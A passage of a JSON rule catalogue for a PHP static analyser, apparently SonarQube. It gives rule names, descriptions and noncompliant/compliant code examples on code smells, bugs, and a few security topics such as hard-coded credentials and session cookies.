break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 3)\n moveWindowToTheBackground();\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 12 > 4 : 4; \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n case 3:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif (($a >= 0 && $a < 10) || ($a >= 20 && $a < 50)) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doTheRest();\n}\n\nint b = a ? 12 > 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n$name = \"George\";\n?>\n<p> Hello <?php echo $name ?>!<\/p>\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference\n was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&$name); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code><?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest<?php \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n<?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Deprecated<\/th>\n <th>Use Instead<\/th>\n <\/tr>\n <tr>\n <td><code>call_user_method()<\/code><\/td>\n <td><code>call_user_func()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>call_user_method_array()<\/code><\/td>\n <td><code>call_user_func_array()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>define_syslog_variables()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>dl()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>ereg()<\/code><\/td>\n <td><code>preg_match()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ereg_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n <\/tr>\n <tr>\n <td><code>eregi()<\/code><\/td>\n <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>eregi_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>session_register()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_unregister()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_is_registered()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>set_socket_blocking()<\/code><\/td>\n <td><code>stream_set_blocking()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>split()<\/code><\/td>\n <td><code>preg_split()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>spliti()<\/code><\/td>\n <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>sql_regcase()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_db_query()<\/code><\/td>\n <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_escape_string()<\/code><\/td>\n <td><code>mysql_real_escape_string()<\/code><\/td>\n <\/tr>\n <tr>\n <td>Passing locale category names as strings<\/td>\n <td>Use the LC_* family of constants<\/td>\n <\/tr>\n <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password); \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php'; \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php'; \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n function f_inner () {\n function f_inner_inner() {\n function f_inner_inner_inner() { \/\/ Noncompliant\n }\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\"; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass MyClass {\n\n public static $name = \"Bob\"; \/\/ Compliant\n\n public static function doSomething($arg) { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&&<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&&<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money; \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time && $have_money; \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n global $myGlobalVariable; \/\/ Noncompliant\n $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo(){\n if ($this->name != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo($nameParam){\n if ($nameParam != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n <li> generating output <\/li>\n <li> modifying <code>ini<\/code> settings <\/li>\n <li> emitting errors or exceptions <\/li>\n <li> modifying global or static variables <\/li>\n <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nprint \"Include worked!\";\n\nclass foo {\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass foo {\n\n public function log() {\n print \"Include worked!\";\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. <code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n self::getStatus(); \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() { \/\/ Doesn't actually get called\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n static::getStatus(); \/\/ Compliant\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() {\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n private static $somevar = \"hello\";\n const CONSTANT = 42;\n\n private static function foo()\n {\n $var = self::$somevar . self::CONSTANT; \/\/ Should be OK\n self::foo(); \/\/ Should be OK\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff'; \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff'; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF'; \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF'; \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\"); \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this->params()->fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Alias<\/th>\n <th>Replacement<\/th>\n <\/tr>\n <tr>\n <td><code>chop<\/code><\/td>\n <td><code>rtrim<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>close<\/code><\/td>\n <td><code>closedir<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>doubleval<\/code><\/td>\n <td><code>floatval<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>fputs<\/code><\/td>\n <td><code>fwrite<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ini_alter<\/code><\/td>\n <td><code>ini_set<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_double<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_integer<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_long<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_real<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_writeable<\/code><\/td>\n <td><code>is_writable<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>join<\/code><\/td>\n <td><code>implode<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>key_exists<\/code><\/td>\n <td><code>array_key_exists<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>magic_quotes_runtime<\/code><\/td>\n <td><code>set_magic_quotes_runtime<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>pos<\/code><\/td>\n <td><code>current<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>show_source<\/code><\/td>\n <td><code>highlight_file<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>sizeof<\/code><\/td>\n <td><code>count<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>strchr<\/code><\/td>\n <td><code>strstr<\/code><\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n firstActionInBlock();\n secondAction(); \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++)\n $str = $array[$i];\n doTheThing($str); \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n firstActionInBlock();\n secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++) {\n $str = $array[$i];\n doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct() {\n $this->object = new SomeOtherClass(); \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct(SomeOtherClass $object) {\n $this->object = $object;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n <li> <a 